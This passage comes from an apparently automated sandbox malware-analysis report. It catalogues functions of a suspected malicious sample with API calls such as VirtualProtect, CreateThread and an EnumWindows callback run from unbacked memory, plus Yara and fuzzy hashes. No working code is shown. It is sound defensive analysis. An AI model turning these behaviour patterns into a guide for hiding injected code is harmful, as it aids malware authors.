                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: e44e123d472ca776dadcfcb1c9fda16aa2fa90f9e914cf17207ec698cff7ed6e
                                                                                                                            • Instruction ID: 7430d08d4eab569d6bf90ca41c9d5d664fa6891e04392872bdf96bc434a392ff
                                                                                                                            • Opcode Fuzzy Hash: e44e123d472ca776dadcfcb1c9fda16aa2fa90f9e914cf17207ec698cff7ed6e
                                                                                                                            • Instruction Fuzzy Hash: 1851B236A106169AFB1F56A8CC17BFF7516EBD0719F68D72CA303EDD82CEB804408600
                                                                                                                            Function 003B1FDF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 4be6e374e4bff62eccc82c3c4f0442d863825646c38bb8042f3670b1aab00b6c
                                                                                                                            • Instruction ID: 3aa6a71f1075d5c0b6be12b0063cc16d49fa46592cc5bbdedbb46ea056c9cd9e
                                                                                                                            • Opcode Fuzzy Hash: 4be6e374e4bff62eccc82c3c4f0442d863825646c38bb8042f3670b1aab00b6c
                                                                                                                            • Instruction Fuzzy Hash: 1741AD76A546169AFB1F52A8CC06BFF7516EBD0719F289729A303EDD86CDBC04408600
                                                                                                                            Function 003B1FF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 01dd390c73c3bde259d133b3f7a808c51f21b1a22f27b22b1612d1d06215faaf
                                                                                                                            • Instruction ID: d7822d9fdf2c94cca5387aed1de3cb904240aa73bb146a53b5f90779dc87001d
                                                                                                                            • Opcode Fuzzy Hash: 01dd390c73c3bde259d133b3f7a808c51f21b1a22f27b22b1612d1d06215faaf
                                                                                                                            • Instruction Fuzzy Hash: 2B41AC76A106159AEB1F56A8CC17BFF751AEBD0719F289728A303EDDC2CDAC04408610
                                                                                                                            Function 003B1052 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 155libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: d80d9dc7ffda5dca5966a78d390929dabf9720420496a113c08ff4b7d6eb3374
                                                                                                                            • Instruction ID: a908c42bdb6ca56ffc40aff83bcce3d90f123d182320fc863705a4fc69a6d87c
                                                                                                                            • Opcode Fuzzy Hash: d80d9dc7ffda5dca5966a78d390929dabf9720420496a113c08ff4b7d6eb3374
                                                                                                                            • Instruction Fuzzy Hash: 17418932E546468EEB1FA6A8CC753FDB659EBC0309FA8D53CC703DED91CA7841809A10
                                                                                                                            Function 003B203D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 41788bd7fbca16d56cbdabdf3d951325aa2484f402744e1148dc19268bc07d1f
                                                                                                                            • Instruction ID: f087e510fa27ca0e112882a5aedf096370ffad36e34fcd93b5c7bc8dec0bc5b7
                                                                                                                            • Opcode Fuzzy Hash: 41788bd7fbca16d56cbdabdf3d951325aa2484f402744e1148dc19268bc07d1f
                                                                                                                            • Instruction Fuzzy Hash: 65418A76A106129AEB1F62ACCC16BFF655AEBD0719F2CE738A303DDD82CCAC04408650
                                                                                                                            Function 003B107D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: 23c5c0ae02eb9a445498dce5c7033c986dd4260ba83f1d4e7b09b0f76b0120b9
                                                                                                                            • Instruction ID: 3dacf6a716e32880b2f2c8fc148a66958b9b90fe81c733fa190195b7b92b381a
                                                                                                                            • Opcode Fuzzy Hash: 23c5c0ae02eb9a445498dce5c7033c986dd4260ba83f1d4e7b09b0f76b0120b9
                                                                                                                            • Instruction Fuzzy Hash: 80416832E546468EEB0F96A8CC753FDB359EB80309FA8D53DCB02DED91CA7845809A50
                                                                                                                            Function 003B2053 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 06b12bca111a1b2aaabbaa3ac75fee9f351a8b48f410928c161474f983d098aa
                                                                                                                            • Instruction ID: 1caffb3f836bc246d1140d4cb766d4f0849cd5edc103d1264198094d130e3d58
                                                                                                                            • Opcode Fuzzy Hash: 06b12bca111a1b2aaabbaa3ac75fee9f351a8b48f410928c161474f983d098aa
                                                                                                                            • Instruction Fuzzy Hash: EF31AF77A106129AEB1F52ACCC16BFF655AEBE0709F2DD738A303DDD82CCAC04408550
                                                                                                                            Function 003B2061 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 852d18017d3e2340b211304488258b738f7fbbae8db7b98aad9d11455063a82a
                                                                                                                            • Instruction ID: 6b2774de419dfc0398beea97c5c955129ac5c4918b743b0c0010138d9305f21c
                                                                                                                            • Opcode Fuzzy Hash: 852d18017d3e2340b211304488258b738f7fbbae8db7b98aad9d11455063a82a
                                                                                                                            • Instruction Fuzzy Hash: 6F317A76A106126AEB1F22BCCC16BFF655AEBE4718F6CE739A303DDD82CDAC04408150
                                                                                                                            Function 003B172B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 003B1797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 7d96fabae2d3ccbe92d7649fcdb2c3e95c606fc3daaaab215139462d66ca8084
                                                                                                                            • Instruction ID: 90bb5c92111daaa1e068583feac577f3158f7b5eb1038b3eaff36dc829f1c447
                                                                                                                            • Opcode Fuzzy Hash: 7d96fabae2d3ccbe92d7649fcdb2c3e95c606fc3daaaab215139462d66ca8084
                                                                                                                            • Instruction Fuzzy Hash: C2316E33A201029BEF0D5B64CD667FEB799E7D4319FA8953DE202EBD85DE3C48449250
                                                                                                                            Function 00421AA0 Relevance: 4.5, APIs: 3, Instructions: 47sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32(?,?,?,?,004137A9,0043CD18,00000005), ref: 00421AB0
                                                                                                                              • Part of subcall function 00425318: __getptd.LIBCMT ref: 0042531D
                                                                                                                            • _rand.LIBCMT ref: 00421AC0
                                                                                                                              • Part of subcall function 0042532A: __getptd.LIBCMT ref: 0042532A
                                                                                                                            • Sleep.KERNEL32(0000000F), ref: 00421AE7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$CountSleepTick_rand
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1716435427-0
                                                                                                                            • Opcode ID: cca24745bf26545fd5b3edd2adad2181406d73069cbbd90972e4226cb2fbf58d
                                                                                                                            • Instruction ID: 95d9c39fcb1a92f549b40d1566920909eef1f56e4dd4b590153865105a78ff57
                                                                                                                            • Opcode Fuzzy Hash: cca24745bf26545fd5b3edd2adad2181406d73069cbbd90972e4226cb2fbf58d
                                                                                                                            • Instruction Fuzzy Hash: 08F081727142146BE700AB6AF881A9E7399AFD43A4B44503AF909C7231D9759841439A
                                                                                                                            Function 003B08CE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 149COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(003B089C,00000000), ref: 003B093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 1ee9b173d1b23e43e8b3b53350e6c332c44dbac0dab3fc048332c86b37f47f0a
                                                                                                                            • Instruction ID: cc11b76cf3a5b48749084d7a74cfa6b6af898eb57b1d5f9f2eaf51b3c21d1df0
                                                                                                                            • Opcode Fuzzy Hash: 1ee9b173d1b23e43e8b3b53350e6c332c44dbac0dab3fc048332c86b37f47f0a
                                                                                                                            • Instruction Fuzzy Hash: A441E536E10229CBEF1E9AA8C8453FF7775FBC0319F29993DC202B6991CA785944C691
                                                                                                                            Function 003B090D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(003B089C,00000000), ref: 003B093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 24ffc371f46f0de56576e07489c72bc5483e5c5a794b096009c5791a276e725f
                                                                                                                            • Instruction ID: ddd8770dcb2c152149e8fffa13c56ed7ada114ccc13b5bc30ca6efab3e321a4b
                                                                                                                            • Opcode Fuzzy Hash: 24ffc371f46f0de56576e07489c72bc5483e5c5a794b096009c5791a276e725f
                                                                                                                            • Instruction Fuzzy Hash: A0315236D11329CBDF1EDAA8C9482FFB771AB81309F29863DC20676995CB741A44C6D2
                                                                                                                            Function 003B08BD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: adc6efd2b932aaf2297a478b2ed613ec12978a31318a0243e848804abda470ea
                                                                                                                            • Instruction ID: 6912853a052b99e085b54126bae8fd189e57765a6f1d8a99c71dc537eb97eba4
                                                                                                                            • Opcode Fuzzy Hash: adc6efd2b932aaf2297a478b2ed613ec12978a31318a0243e848804abda470ea
                                                                                                                            • Instruction Fuzzy Hash: 7F318235D11329CBDF1ECAA8C9482FFB771BB81709F2A963DC20676995CA341A44C6D1
                                                                                                                            Function 003B0938 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(003B089C,00000000), ref: 003B093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 2c3dd29b98de14fc247514b6294b694b0177f5b73a4d53a0db72cb699a8fa6af
                                                                                                                            • Instruction ID: 924edad0f454bc8cbbf6f1e644603a6fb3afcd9b35839a33e35104de16788589
                                                                                                                            • Opcode Fuzzy Hash: 2c3dd29b98de14fc247514b6294b694b0177f5b73a4d53a0db72cb699a8fa6af
                                                                                                                            • Instruction Fuzzy Hash: 7E215335D11329CFDF1ECAA8C9482FFB771BB81709F2A9639C20576994CA341A44C6D1
                                                                                                                            Function 003B2091 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction ID: 8878d30e9369b70146fc891733b1b81426f051f192e01eb328917cc860599f90
                                                                                                                            • Opcode Fuzzy Hash: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction Fuzzy Hash: 5631257AA5491266EB1F22ACCC2ABFF544AE7E4719F68EB39A303DCD82CCAD04404150
                                                                                                                            Function 003B20B8 Relevance: 3.1, APIs: 2, Instructions: 106threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 003B2124
                                                                                                                              • Part of subcall function 003B216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction ID: 36a1bd077eea64965a5d0b017185de0076036134f67e3829914a57b7297f057b
                                                                                                                            • Opcode Fuzzy Hash: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction Fuzzy Hash: 1121F57A66491269EB1F22BCCC2ABFF544AE7E4708F68EB3DA313DCD92DC9D05805150
                                                                                                                            Function 003B20F7 Relevance: 3.1, APIs: 2, Instructions: 86threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 003B2124
                                                                                                                              • Part of subcall function 003B216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 9349f056b0b02ee25d4394e217fd01f95e6d08a6e456e14775c8b4b7317b2888
                                                                                                                            • Instruction ID: be4d497921d72884feb2d5d55b265d01500ba37c2353a9cb15a2ce30ee81f845
                                                                                                                            • Opcode Fuzzy Hash: 9349f056b0b02ee25d4394e217fd01f95e6d08a6e456e14775c8b4b7317b2888
                                                                                                                            • Instruction Fuzzy Hash: 6D112976A1491366EB1F22ACCC1ABFF544AE7E4709F68D73D97139CD92DD9801804150
                                                                                                                            Function 003B2122 Relevance: 3.1, APIs: 2, Instructions: 74threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 003B2124
                                                                                                                              • Part of subcall function 003B216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 6fa603f21a32fd82ace2bf48d055e2b0fa8e0f3ca1c3d1e55c02ee84f5a26be5
                                                                                                                            • Instruction ID: 24e0017e04d1ff8b5d4e5a6e4c1214b34772ec59544a52bf54367a003e231605
                                                                                                                            • Opcode Fuzzy Hash: 6fa603f21a32fd82ace2bf48d055e2b0fa8e0f3ca1c3d1e55c02ee84f5a26be5
                                                                                                                            • Instruction Fuzzy Hash: 09114E7A61491266EB1F22BCCC1ABFF540DE7E4708F69E7399713DCD92DC9C05804150
                                                                                                                            Function 00424FAB Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___crtCorExitProcess.LIBCMT ref: 00424FB3
                                                                                                                              • Part of subcall function 00424F80: GetModuleHandleW.KERNEL32(mscoree.dll,?,00424FB8,00000000,?,00424BB1,000000FF,0000001E,00000001,00000000,00000000,?,0042BB22,00000000,00000001,00000000), ref: 00424F8A
                                                                                                                              • Part of subcall function 00424F80: GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00424FB8,00000000,?,00424BB1,000000FF,0000001E,00000001,00000000,00000000,?,0042BB22,00000000,00000001), ref: 00424F9A
                                                                                                                            • ExitProcess.KERNEL32 ref: 00424FBC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2427264223-0
                                                                                                                            • Opcode ID: acb0b96e5d7b1b8226b6257d47aedadf66f780226aaa0bc32b7b11d0c72c4378
                                                                                                                            • Instruction ID: 8adfa64dcbc294924a92c8ce15d3caf5c29eb82d74d13aa7cf5eef3ff7ada807
                                                                                                                            • Opcode Fuzzy Hash: acb0b96e5d7b1b8226b6257d47aedadf66f780226aaa0bc32b7b11d0c72c4378
                                                                                                                            • Instruction Fuzzy Hash: 35B09231104148BFCB052F12ED0AC893F2AEBC03A1B928225F90949431DF72EE929A89
                                                                                                                            Function 0042CAC0 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042BB6C,00000000,?,00000000,00000000,00000000,?,00427528,00000001,00000214), ref: 0042CB03
                                                                                                                              • Part of subcall function 0042570D: __getptd_noexit.LIBCMT ref: 0042570D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 328603210-0
                                                                                                                            • Opcode ID: c8e910655e94cfc31e8cb51fea09bd2b4795ac7b12b6ed9994a88b4eec620261
                                                                                                                            • Instruction ID: 8e65df08a9423b0807d497d14f4799f3672e50ee20dc361ebe088a0b243ff951
                                                                                                                            • Opcode Fuzzy Hash: c8e910655e94cfc31e8cb51fea09bd2b4795ac7b12b6ed9994a88b4eec620261
                                                                                                                            • Instruction Fuzzy Hash: 9201D8313012359BEB24DF25FC96B6F3794EB81360F44462BE915C7290DB79DC00C688
                                                                                                                            Function 003B216C Relevance: 1.5, APIs: 1, Instructions: 45threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: 49143707107687e7b35d10633917b1b6a73f6eaea7c8d102e89f15c667ebe446
                                                                                                                            • Instruction ID: 6c6909c99e1c965ec7a0e483763ad85158c4fd56a6f1516542ecc2c6fb6a47f7
                                                                                                                            • Opcode Fuzzy Hash: 49143707107687e7b35d10633917b1b6a73f6eaea7c8d102e89f15c667ebe446
                                                                                                                            • Instruction Fuzzy Hash: 1BF058BA66091254FB1E22A8CC26BBA440AE7E4719F68EA3D6713DCE86DD9D85814010
                                                                                                                            Function 003B176A Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 003B1797
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            • Opcode ID: 7fdecd4c65e739fd43d314d6a2364bc55c7da5283aaa43a512b286945ce32d55
                                                                                                                            • Instruction ID: b457d96ca2df0faa6fb0c2c04c9653b7781f63dfb2d1479f5601b615be42a87e
                                                                                                                            • Opcode Fuzzy Hash: 7fdecd4c65e739fd43d314d6a2364bc55c7da5283aaa43a512b286945ce32d55
                                                                                                                            • Instruction Fuzzy Hash: E9F02B37B151028BDB1EA698DD771FDB3A9E7E431E7F8A02DC203EAE81EE6905405150
                                                                                                                            Function 003B21AB Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: d3effeb4ccc460ffd5b9c48fd513fce9e933a506ef15c2b4fcc5ee762b752ca6
                                                                                                                            • Instruction ID: b2b0bca279e046a953b780788da3135278cd6a2def3b591c900aa2aba2495544
                                                                                                                            • Opcode Fuzzy Hash: d3effeb4ccc460ffd5b9c48fd513fce9e933a506ef15c2b4fcc5ee762b752ca6
